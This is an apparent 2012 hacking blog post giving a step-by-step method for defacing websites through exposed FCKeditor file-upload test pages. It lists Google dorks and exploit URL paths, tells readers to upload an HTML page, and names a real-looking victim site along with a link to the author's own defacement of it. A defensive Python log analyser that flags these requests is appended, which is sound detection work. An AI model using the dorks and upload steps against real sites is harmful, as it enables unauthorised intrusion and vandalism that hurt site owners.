Sunday, 26 August 2012

Defacing with the FCKeditor method


Hmmm, this time akyra will post about defacing a website with the FCKeditor method.

The dorks (just try them out):
- inurl:/editor/editor/filemanager/
- inurl:/HTMLEditor/editor/
- inurl:/HTMLEditor/editor//filemanager/
- inurl:/HTMLEditor/editor/filemanager/connectors/

Exploit:
- http://[target.com]/editor/editor/filemanager/upload/test.html
- http://[Target.com]/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html


Enter the dorks above ^ into Google and look for a target... once you find one,

ex: http://www.centerkennedy.com.br/moveiseletro/editor/editor/filemanager/

append the exploit path above....
so it becomes.......
ex: http://www.centerkennedy.com.br/moveiseletro/editor/editor/filemanager/upload/test.html

At [Select the "File Uploader" to use: ] <----- choose PHP

Then upload your HTML file.....
Click "Send it to Server". If it succeeds, i.e. the file is uploaded, the [Uploaded File URL:] box will show the path where your file was uploaded.

ex: what appears in the [Uploaded File URL:] box: /UserFiles/html_kamu.html

So the result is at http://[target.com]/editor/html_kamu.html
Easy, right.... hehehehehe
Here is the result of my defacement :D
http://www.centerkennedy.com.br/editor/images/anon_knight.html

Source: Hacker Indonesia
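Seen from the server side, the steps above leave a recognisable trail in the web access log. The script below is an added example, not code from the original post: it flags requests for the two test pages named above, successful POSTs under `/editor/filemanager/`, and a later fetch of an HTML file from `/UserFiles/` by the same client. The log lines, IP addresses and the upload script path in the sample are constructed, and the combined log format is an assumption.

```python
import re

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Aug/2012:10:01:02 +0000] "GET /site/editor/editor/filemanager/upload/test.html HTTP/1.1" 200 2101
203.0.113.7 - - [26/Aug/2012:10:01:40 +0000] "POST /site/editor/editor/filemanager/upload/php/upload.php HTTP/1.1" 200 310
203.0.113.7 - - [26/Aug/2012:10:01:55 +0000] "GET /UserFiles/page.html HTTP/1.1" 200 5120
198.51.100.4 - - [26/Aug/2012:10:05:00 +0000] "GET /index.php HTTP/1.1" 200 900
198.51.100.9 - - [26/Aug/2012:10:06:00 +0000] "GET /HTMLEditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 404 210
"""

# client IP, method, request target, status code
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# The two upload test pages named in the post.
TEST_PAGE = re.compile(
    r'/editor/filemanager/(upload/test|connectors/uploadtest)\.html$', re.I)
# Assumption: any POST below the file manager directory is an upload attempt.
FILEMANAGER = re.compile(r'/editor/filemanager/', re.I)
# HTML served from the upload directory shown in the "Uploaded File URL" box.
USERFILES = re.compile(r'/UserFiles/[^?]*\.html?$', re.I)


def analyze(log_text):
    """Return (ip, finding, path) tuples in log order."""
    findings = []
    uploaders = set()  # clients that completed a POST under the file manager
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, method, url, status = m.groups()
        path = url.split("?", 1)[0]
        ok = status.startswith("2")
        if method == "GET" and TEST_PAGE.search(path):
            # A 2xx answer means the test page is still deployed and reachable.
            kind = "test-page-exposed" if ok else "test-page-probe"
            findings.append((ip, kind, path))
        elif method == "POST" and FILEMANAGER.search(path) and ok:
            uploaders.add(ip)
            findings.append((ip, "filemanager-upload", path))
        elif (method == "GET" and ok and ip in uploaders
              and USERFILES.search(path)):
            findings.append((ip, "uploaded-html-served", path))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

A `test-page-exposed` finding on your own server means the upload test page should be removed and the file manager connectors disabled or placed behind authentication.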
